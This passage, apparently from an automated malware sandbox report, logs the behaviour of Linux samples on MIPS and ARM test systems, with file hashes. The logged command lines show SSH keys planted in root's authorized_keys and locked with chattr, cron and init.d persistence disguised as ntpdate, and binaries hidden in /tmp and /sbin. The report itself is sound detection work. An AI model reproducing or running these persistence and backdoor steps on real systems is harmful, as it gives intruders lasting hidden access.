| File opened for modification | /home/user/.ssh/authorized_keys | /tmp/.update/auth | N/A |
| File opened for modification | /root/.ssh/authorized_keys | /tmp/.update/auth | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.update/authusers | /tmp/.update/auth | N/A |
Processes
/tmp/.update/auth
[/tmp/.update/auth]
/bin/uname
[uname -n]
/bin/mkdir
[mkdir /root/.ssh]
/bin/chmod
[chmod 0700 /root/.ssh]
/bin/chmod
[chmod 0644 /root/.ssh/authorized_keys]
/usr/bin/chattr
[chattr +ai /root/.ssh /root/.ssh/authorized_keys]
/bin/rm
[rm -rf authusers]
/bin/cat
[cat /etc/passwd]
/bin/grep
[grep -e /bin/sh -e /bin/bash]
/usr/bin/cut
[cut -d : -f 1]
/usr/bin/cut
[cut -d : -f 6]
/usr/bin/chattr
[chattr -ai /root/.ssh /root/.ssh/authorized_keys]
/bin/sed
[sed -i /r78x7ECphuPrGrR4SDqE1w/d /root/.ssh/authorized_keys]
/usr/bin/cut
[cut -d : -f 1]
/usr/bin/cut
[cut -d : -f 6]
/bin/mkdir
[mkdir /home/user/.ssh]
/bin/chown
[chown -R user /home/user/.ssh]
Network
Files
/root/.ssh/authorized_keys
| MD5 | 3fdca3b51b9c7ea16d39ffe168fdb5f9 |
| SHA1 | 129679920ccdd3b0f43bb743c475d0e6bfa65488 |
| SHA256 | c11d21fa2f98c2c0a1c311042d0d3302f289b47320fdaaaff371b100c2e97b22 |
| SHA512 | eee67cda123034a81886571e6aa1dcd7d5eb7eb74af6ed71e336b6cb4fbe151ccc7efdcdbecc50b17dcfd00ef319edc119648fbbfd3643c98afa80c88d425f94 |
/tmp/.update/authusers
| MD5 | 9514cd886e4faf1f23baadfd967abcbd |
| SHA1 | 00894ed21cee494a192e94a782ae265e45d828f1 |
| SHA256 | 6b6a14023ccb73d8e3ae440f372d66866d50ecd2141acc8cd947e29fd088d432 |
| SHA512 | 17fb1a18e12a6c04f960d4c54d00100ebd87c20976bd98bb8d8b242725519ce3968ad9312472dfafc4e67e46a9eddba4a993511ec557035f09d94b7548c50ce6 |
/tmp/.update/authusers
| MD5 | fe065880cc6e0333e8679d0e03ff2369 |
| SHA1 | aaceb9f893c93f47ddccca1e2e502c01ecbc5456 |
| SHA256 | f06caf37e0abb7fe702087801c3ef6507d69560d1992dc4f3a2e788e70a37a77 |
| SHA512 | ccbe5ac641458e053b073b3cc9ebb5be2c086a5ec76ff46f36f8373a64e3964b6a1953a4165a6cd1b0cda52a3aed0f6227d4bec8f0370169bd68ed09e2a02e92 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-mipsbe-20240729-en
Max time kernel
2s
Command Line
Signatures
Enumerates running processes
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/16/stat | /bin/ps | N/A |
| File opened for reading | /proc/18/status | /bin/ps | N/A |
| File opened for reading | /proc/70/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/672/status | /bin/ps | N/A |
| File opened for reading | /proc/13/status | /bin/ps | N/A |
| File opened for reading | /proc/379/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/10/stat | /bin/ps | N/A |
| File opened for reading | /proc/72/stat | /bin/ps | N/A |
| File opened for reading | /proc/172/status | /bin/ps | N/A |
| File opened for reading | /proc/10/status | /bin/ps | N/A |
| File opened for reading | /proc/380/stat | /bin/ps | N/A |
| File opened for reading | /proc/675/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/13/stat | /bin/ps | N/A |
| File opened for reading | /proc/4/stat | /bin/ps | N/A |
| File opened for reading | /proc/15/stat | /bin/ps | N/A |
| File opened for reading | /proc/732/stat | /bin/ps | N/A |
| File opened for reading | /proc/737/stat | /bin/ps | N/A |
| File opened for reading | /proc/18/stat | /bin/ps | N/A |
| File opened for reading | /proc/110/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/82/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/157/status | /bin/ps | N/A |
| File opened for reading | /proc/232/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/4/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/728/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/385/stat | /bin/ps | N/A |
| File opened for reading | /proc/726/status | /bin/ps | N/A |
| File opened for reading | /proc/232/stat | /bin/ps | N/A |
| File opened for reading | /proc/334/stat | /bin/ps | N/A |
| File opened for reading | /proc/334/status | /bin/ps | N/A |
| File opened for reading | /proc/3/stat | /bin/ps | N/A |
| File opened for reading | /proc/12/status | /bin/ps | N/A |
| File opened for reading | /proc/337/status | /bin/ps | N/A |
| File opened for reading | /proc/11/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/10/status | /bin/ps | N/A |
| File opened for reading | /proc/1/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/20/status | /bin/ps | N/A |
| File opened for reading | /proc/749/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/10/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/686/status | /bin/ps | N/A |
| File opened for reading | /proc/728/status | /bin/ps | N/A |
| File opened for reading | /proc/sys/kernel/pid_max | /bin/ps | N/A |
| File opened for reading | /proc/122/status | /bin/ps | N/A |
| File opened for reading | /proc/365/stat | /bin/ps | N/A |
| File opened for reading | /proc/70/stat | /bin/ps | N/A |
| File opened for reading | /proc/73/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/9/status | /bin/ps | N/A |
| File opened for reading | /proc/17/stat | /bin/ps | N/A |
| File opened for reading | /proc/706/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/9/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/750/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/3/status | /bin/ps | N/A |
| File opened for reading | /proc/12/stat | /bin/ps | N/A |
| File opened for reading | /proc/17/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/725/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/73/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/75/stat | /bin/ps | N/A |
| File opened for reading | /proc/675/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/232/stat | /bin/ps | N/A |
| File opened for reading | /proc/247/stat | /bin/ps | N/A |
| File opened for reading | /proc/736/status | /bin/ps | N/A |
| File opened for reading | /proc/22/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/36/status | /bin/ps | N/A |
| File opened for reading | /proc/3/status | /bin/ps | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/cp | N/A |
Processes
/tmp/.systemd/.run
[/tmp/.systemd/.run]
/bin/grep
[grep -v R]
/bin/ps
[ps x]
/bin/grep
[grep ssh ]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/ps
[ps x]
/bin/grep
[grep ssh$]
/bin/grep
[grep -v R]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/grep
[grep -v R]
/bin/grep
[grep sh$]
/bin/ps
[ps x]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/uname
[uname -m]
/bin/cp
[cp -f -- .mips -bash]
/tmp/.systemd/-bash
[./-bash]
Network
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-mipsbe-20240729-en
Max time kernel
1s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.H4b4Eo | /usr/bin/crontab | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.systemd/systemd.dir | /tmp/.systemd/auto | N/A |
| File opened for modification | /tmp/.systemd/systemd.d | /tmp/.systemd/auto | N/A |
| File opened for modification | /tmp/.systemd/.systemd | /tmp/.systemd/auto | N/A |
Processes
/tmp/.systemd/auto
[/tmp/.systemd/auto]
/bin/uname
[uname -m]
/bin/cat
[cat systemd.dir]
/usr/bin/crontab
[crontab -l]
/bin/grep
[grep .systemd]
/usr/bin/wc
[wc -l]
/usr/bin/crontab
[crontab -l]
/usr/bin/crontab
[crontab systemd.d]
/bin/rm
[rm -rf systemd.d]
/bin/chmod
[chmod u+x .systemd]
Network
Files
/tmp/.systemd/systemd.dir
| MD5 | 1f3a48ead214b69a4e5bbcc12a732ddb |
| SHA1 | 3391a93f27a805c58de438e5a50267af13b619ab |
| SHA256 | 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c |
| SHA512 | 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d |
/var/spool/cron/crontabs/tmp.H4b4Eo
| MD5 | 54e3db15261abf8fb2fe18e1bc40ac54 |
| SHA1 | 1817d7f2f29f77d7a12c631828edbdce337e6a84 |
| SHA256 | 74a6d7c05f80bf9fd583ad1e7d7422c6acdb640eb7c2dc0147b4d9f7d1950e0b |
| SHA512 | 4aecb5695a6db5fdb136f8520e4cbea9a4edb9b9968d69b006641a61ab257df78a85de7ac12ca5606abb6de67892b8416ac36db5a06ff5bce1927b4f0cc953ed |
/tmp/.systemd/.systemd
| MD5 | 9ef2b0f44129dbed4b1284c1d748b10b |
| SHA1 | 2bb3bcea6f21a5567090bdacd84ca4b1482d9f68 |
| SHA256 | 5a2aceb88f74b14be6fb451f8d7d0fb29b5eb5c14a1342c51fddbf312e158cf3 |
| SHA512 | e0daccbdd2034b50c8444482efda6d66988b19ac5424ae39452a643993fe3383c8be855a49c83cdaa37bbd1563c7dc0883d2bc96807471558a5bc4209a24738c |
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
debian9-mipsel-20240611-en
Max time kernel
1s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.53uIAl | /usr/bin/crontab | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
| File opened for reading | /proc/filesystems | /usr/bin/crontab | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.systemd/systemd.d | /tmp/.systemd/auto | N/A |
| File opened for modification | /tmp/.systemd/.systemd | /tmp/.systemd/auto | N/A |
| File opened for modification | /tmp/.systemd/systemd.dir | /tmp/.systemd/auto | N/A |
Processes
/tmp/.systemd/auto
[/tmp/.systemd/auto]
/bin/uname
[uname -m]
/bin/cat
[cat systemd.dir]
/usr/bin/crontab
[crontab -l]
/bin/grep
[grep .systemd]
/usr/bin/wc
[wc -l]
/usr/bin/crontab
[crontab -l]
/usr/bin/crontab
[crontab systemd.d]
/bin/rm
[rm -rf systemd.d]
/bin/chmod
[chmod u+x .systemd]
Network
Files
/tmp/.systemd/systemd.dir
| MD5 | 1f3a48ead214b69a4e5bbcc12a732ddb |
| SHA1 | 3391a93f27a805c58de438e5a50267af13b619ab |
| SHA256 | 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c |
| SHA512 | 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d |
/var/spool/cron/crontabs/tmp.53uIAl
| MD5 | dbb47228523c48edfe60dda1b012f03d |
| SHA1 | 64adf38fbd662f2cdc856b0a1a1898d60d2e5c14 |
| SHA256 | 0985d86b6a0b52111095135d4a0e5405848d42318445492d6540784bfc61f30e |
| SHA512 | a720fc83063c925b735443be41ae8857d342c1a6dd64afe3463b6c9c64c35e4725641d3db5dd5ce7f22fc965e77d5218fb0903c592c51c777992e59b9419a287 |
/tmp/.systemd/.systemd
| MD5 | 9ef2b0f44129dbed4b1284c1d748b10b |
| SHA1 | 2bb3bcea6f21a5567090bdacd84ca4b1482d9f68 |
| SHA256 | 5a2aceb88f74b14be6fb451f8d7d0fb29b5eb5c14a1342c51fddbf312e158cf3 |
| SHA512 | e0daccbdd2034b50c8444482efda6d66988b19ac5424ae39452a643993fe3383c8be855a49c83cdaa37bbd1563c7dc0883d2bc96807471558a5bc4209a24738c |
Analysis: behavioral20
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-armhf-20240611-en
Max time kernel
2s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /etc/cron.d/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.daily/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.hourly/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.monthly/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.weekly/ntpdate | /usr/bin/tee | N/A |
Modifies init.d
| Description | Indicator | Process | Target |
| File opened for modification | /etc/init.d/ntpdate | /usr/bin/tee | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/entpdate | /usr/bin/tee | N/A |
| File opened for modification | /sbin/lntpdate | /usr/bin/tee | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.systemd/systemd.dir | /tmp/.systemd/ntpdate | N/A |
Processes
/tmp/.systemd/ntpdate
[/tmp/.systemd/ntpdate]
/bin/uname
[uname -m]
/bin/cat
[cat systemd.dir]
/bin/mkdir
[mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly]
/usr/bin/chattr
[chattr -i -a /etc/cron.*/ntpdate /sbin/bcrond]
/bin/rm
[rm -rf /sbin/bcrond]
/bin/cp
[cp -f -r -- /tmp/.systemd/.armv7l /sbin/bcrond]
/usr/bin/tee
[tee -a /etc/cron.d/ntpdate /etc/cron.daily/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate]
/bin/chmod
[chmod +x /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]
/usr/bin/chattr
[chattr +i +a /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]
/usr/bin/chattr
[chattr -a -i /sbin/bsysd]
/bin/rm
[rm -rf /sbin/bsysd]
/usr/bin/which
[which systemctl]
/usr/bin/chattr
[chattr -i -a /sbin/entpdate /sbin/bsysde]
/bin/rm
[rm -rf /sbin/bsysde]
/bin/cp
[cp -f -r -- /tmp/.systemd/.armv7l /sbin/bsysde]
/usr/bin/tee
[tee -a /sbin/entpdate]
/bin/chmod
[chmod +x /sbin/entpdate]
/usr/bin/chattr
[chattr +i +a /sbin/entpdate /sbin/bsysde]
/usr/bin/which
[which systemctl]
/usr/bin/chattr
[chattr -i -a /sbin/lntpdate /sbin/bsysdl]
/bin/rm
[rm -rf /sbin/bsysdl]
/bin/cp
[cp -f -r -- /tmp/.systemd/.armv7l /sbin/bsysdl]
/usr/bin/tee
[tee -a /sbin/lntpdate]
/bin/chmod
[chmod +x /sbin/lntpdate]
/usr/bin/chattr
[chattr +i +a /sbin/lntpdate /sbin/bsysdl]
/usr/bin/which
[which update-rc.d]
/usr/bin/chattr
[chattr -i -a /etc/init.d/ntpdate /sbin/binitd]
/bin/rm
[rm -rf /sbin/binitd]
/bin/cp
[cp -f -r -- /tmp/.systemd/.armv7l /sbin/binitd]
/usr/bin/tee
[tee -a /etc/init.d/ntpdate]
/bin/chmod
[chmod +x /etc/init.d/ntpdate /sbin/binitd]
/usr/bin/chattr
[chattr +i +a /etc/init.d/ntpdate /sbin/binitd]
/usr/bin/which
[which chkconfig]
Network
Files
/tmp/.systemd/systemd.dir
| MD5 | 1f3a48ead214b69a4e5bbcc12a732ddb |
| SHA1 | 3391a93f27a805c58de438e5a50267af13b619ab |
| SHA256 | 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c |
| SHA512 | 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d |
/etc/cron.d/ntpdate
| MD5 | 755700d11d59e0daeb4f6452aee1ad5d |
| SHA1 | 6b1194921376bef9c7559629712772a11e78eaa4 |
| SHA256 | 1b311adac81faa8f9bf687306192ff84c2ee12a9337dd1051c55004ce39a2b00 |
| SHA512 | 446f3d05218fa12190dadd2f405345b9a5581221064314e8bce54b155c08ad9bdba17d15f6959e5eb987baaffa309cfb19bf92a1a944d580f66419060a44b2b7 |
/sbin/entpdate
| MD5 | 4aeb6335d69473274691f59dc2096cfe |
| SHA1 | 440755e42aa67c6ab3e636aeb1e8ec9463cd7ffc |
| SHA256 | 87095fcf498e832162baa13ecd28367155d8a1b5d02aee9ec1b60e149a871785 |
| SHA512 | 23b0ef7f02e090cae5b7c20f8b06f4c450e6e8ddc49f3df9c49d223aa2df36339bb92df56e4609240d5e2066ee328db0abebd38de4b3eef304e83e72f4f1886c |
/sbin/lntpdate
| MD5 | 3748e897538baafbc7b260b4d2fbc98f |
| SHA1 | 41d179e3cfc4c1820ea2c0fed0d50009564db79b |
| SHA256 | ebcbd097cd86e990591360d56f077f37de35fd6f4ce222c6d286f2f7e1024cc7 |
| SHA512 | 23519c47db8c96ed72be6833778013df9199bb6d243e989fca2a75dd55d2a5aca37228fc19b0e2537cb5e10a27d69815edc5b640c8e878d7e767559904eaccea |
/etc/init.d/ntpdate
| MD5 | bd99a962d94b5b4c32f8b7c8ca1f9ea9 |
| SHA1 | af33dc04d1f16e5ccceb2c0569b26e45bb65b32b |
| SHA256 | 64e489965b3914b15f92dadd851560e95287a40923b6cc93849e0758cdbf8b28 |
| SHA512 | fc2f81575bab833e76f070a45c3b9a1a32bb3c19084166c0beed3d03694d38295f6761af1599169f84a2c6f4b8c8bd8e1d8230796191de84dda52edd6899cdfa |
Analysis: behavioral26
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-mipsbe-20240729-en
Max time kernel
0s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.update/update.dir | /tmp/.update/.run | N/A |
| File opened for modification | /tmp/.update/.update | /tmp/.update/.run | N/A |
Processes
/tmp/.update/.run
[/tmp/.update/.run]
/bin/uname
[uname -m]
/bin/cat
[cat update.dir]
/tmp/.update/.mips
[./.mips -f]
Network
Files
/tmp/.update/update.dir
| MD5 | f162d09e078b8201089b7e20ea72f2bf |
| SHA1 | f7da8700cd21e201f62a17992d2ac15c09c447a1 |
| SHA256 | 2162d6f6fadf44bb1db38ea55ec80a7006c269061de5141bf9f4743ec9cd95fb |
| SHA512 | adb0481faeeb35926c8ba2bf2549e7b43dc40864ebfb8c40274d5021dfc3d87a8c2c2aa2996a28068c061ae13c404e85e870a23a67a709b4522134ce2be221cb |
/tmp/.update/.update
| MD5 | a0669fc7ed6e6c80a991b070e1f7909a |
| SHA1 | 313f4f3deaf4237a8d0059593f1a68d7b7cc434f |
| SHA256 | 808530d3d871a0ae2d88b92e3820c8dbdd9b9a1ab469d4ed0088dce65b96545b |
| SHA512 | 2963bbba5c52178b3732139352144c8b34a81561ada3b803f50fdd51401017dc762fbdaed483e24da56b59d04381c8122b912c31d624a13d19ddfe951a55ec1f |
Analysis: behavioral32
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-mipsel-20240729-en
Max time kernel
2s
Command Line
Signatures
Adds new SSH keys
| Description | Indicator | Process | Target |
| File opened for modification | /root/.ssh/authorized_keys | /tmp/.update/auth | N/A |
| File opened for modification | /home/user/.ssh/authorized_keys | /tmp/.update/auth | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /bin/sed | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.update/authusers | /tmp/.update/auth | N/A |
Processes
/tmp/.update/auth
[/tmp/.update/auth]
/bin/uname
[uname -n]
/bin/mkdir
[mkdir /root/.ssh]
/bin/chmod
[chmod 0700 /root/.ssh]
/bin/chmod
[chmod 0644 /root/.ssh/authorized_keys]
/usr/bin/chattr
[chattr +ai /root/.ssh /root/.ssh/authorized_keys]
/bin/rm
[rm -rf authusers]
/bin/grep
[grep -e /bin/sh -e /bin/bash]
/bin/cat
[cat /etc/passwd]
/usr/bin/cut
[cut -d : -f 1]
/usr/bin/cut
[cut -d : -f 6]
/usr/bin/chattr
[chattr -ai /root/.ssh /root/.ssh/authorized_keys]
/bin/sed
[sed -i /r78x7ECphuPrGrR4SDqE1w/d /root/.ssh/authorized_keys]
/usr/bin/cut
[cut -d : -f 1]
/usr/bin/cut
[cut -d : -f 6]
/bin/mkdir
[mkdir /home/user/.ssh]
/bin/chown
[chown -R user /home/user/.ssh]
Network
Files
/root/.ssh/authorized_keys
| MD5 | 5c32d0c2275c7ce0965aafd240461f13 |
| SHA1 | 17eb3e899cf234ee1a8ddc07e8979d72a0d92a0c |
| SHA256 | d7517566205c297d1efd7a9e81a57fc53f39e6ce2e42f0044933238d37da36ce |
| SHA512 | 3c0aa1096dd8f538616a43b1a32b8b97322608d53ed35f7dea500f799a29b3eccaeecfe0b1358cf118ad3c0f1d74f23ca7650ad8174a5cad1751e1667bd6d13c |
/tmp/.update/authusers
| MD5 | 9514cd886e4faf1f23baadfd967abcbd |
| SHA1 | 00894ed21cee494a192e94a782ae265e45d828f1 |
| SHA256 | 6b6a14023ccb73d8e3ae440f372d66866d50ecd2141acc8cd947e29fd088d432 |
| SHA512 | 17fb1a18e12a6c04f960d4c54d00100ebd87c20976bd98bb8d8b242725519ce3968ad9312472dfafc4e67e46a9eddba4a993511ec557035f09d94b7548c50ce6 |
/tmp/.update/authusers
| MD5 | fe065880cc6e0333e8679d0e03ff2369 |
| SHA1 | aaceb9f893c93f47ddccca1e2e502c01ecbc5456 |
| SHA256 | f06caf37e0abb7fe702087801c3ef6507d69560d1992dc4f3a2e788e70a37a77 |
| SHA512 | ccbe5ac641458e053b073b3cc9ebb5be2c086a5ec76ff46f36f8373a64e3964b6a1953a4165a6cd1b0cda52a3aed0f6227d4bec8f0370169bd68ed09e2a02e92 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
debian9-armhf-20240611-en
Max time kernel
2s
Command Line
Signatures
Enumerates running processes
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/13/stat | /bin/ps | N/A |
| File opened for reading | /proc/28/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/29/status | /bin/ps | N/A |
| File opened for reading | /proc/281/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/295/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/661/stat | /bin/ps | N/A |
| File opened for reading | /proc/683/stat | /bin/ps | N/A |
| File opened for reading | /proc/28/stat | /bin/ps | N/A |
| File opened for reading | /proc/606/status | /bin/ps | N/A |
| File opened for reading | /proc/3/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/342/status | /bin/ps | N/A |
| File opened for reading | /proc/598/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/683/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/14/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/144/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/679/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/26/status | /bin/ps | N/A |
| File opened for reading | /proc/29/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/22/status | /bin/ps | N/A |
| File opened for reading | /proc/314/stat | /bin/ps | N/A |
| File opened for reading | /proc/328/stat | /bin/ps | N/A |
| File opened for reading | /proc/606/status | /bin/ps | N/A |
| File opened for reading | /proc/691/stat | /bin/ps | N/A |
| File opened for reading | /proc/12/status | /bin/ps | N/A |
| File opened for reading | /proc/155/stat | /bin/ps | N/A |
| File opened for reading | /proc/279/stat | /bin/ps | N/A |
| File opened for reading | /proc/283/stat | /bin/ps | N/A |
| File opened for reading | /proc/694/status | /bin/ps | N/A |
| File opened for reading | /proc/686/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/686/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/706/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/41/stat | /bin/ps | N/A |
| File opened for reading | /proc/sys/kernel/osrelease | /bin/ps | N/A |
| File opened for reading | /proc/283/stat | /bin/ps | N/A |
| File opened for reading | /proc/81/status | /bin/ps | N/A |
| File opened for reading | /proc/342/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/685/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/self/stat | /bin/ps | N/A |
| File opened for reading | /proc/316/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/1/status | /bin/ps | N/A |
| File opened for reading | /proc/281/status | /bin/ps | N/A |
| File opened for reading | /proc/155/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/601/status | /bin/ps | N/A |
| File opened for reading | /proc/113/stat | /bin/ps | N/A |
| File opened for reading | /proc/693/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/43/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/279/status | /bin/ps | N/A |
| File opened for reading | /proc/8/stat | /bin/ps | N/A |
| File opened for reading | /proc/143/stat | /bin/ps | N/A |
| File opened for reading | /proc/103/stat | /bin/ps | N/A |
| File opened for reading | /proc/598/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/229/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/280/stat | /bin/ps | N/A |
| File opened for reading | /proc/598/status | /bin/ps | N/A |
| File opened for reading | /proc/686/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/2/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/29/stat | /bin/ps | N/A |
| File opened for reading | /proc/603/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/655/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/679/status | /bin/ps | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/24/stat | /bin/ps | N/A |
| File opened for reading | /proc/26/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/21/stat | /bin/ps | N/A |
Processes
/tmp/.systemd/.run
[/tmp/.systemd/.run]
/bin/grep
[grep -v R]
/bin/ps
[ps x]
/bin/grep
[grep ssh ]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/ps
[ps x]
/bin/grep
[grep ssh$]
/bin/grep
[grep -v R]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/grep
[grep sh$]
/bin/ps
[ps x]
/bin/grep
[grep -v R]
/bin/grep
[grep -v grep]
/usr/bin/awk
[awk {print $1}]
/bin/uname
[uname -m]
/bin/cp
[cp -f -- .armv7l -bash]
/tmp/.systemd/-bash
[./-bash]
Network
Files
Analysis: behavioral11
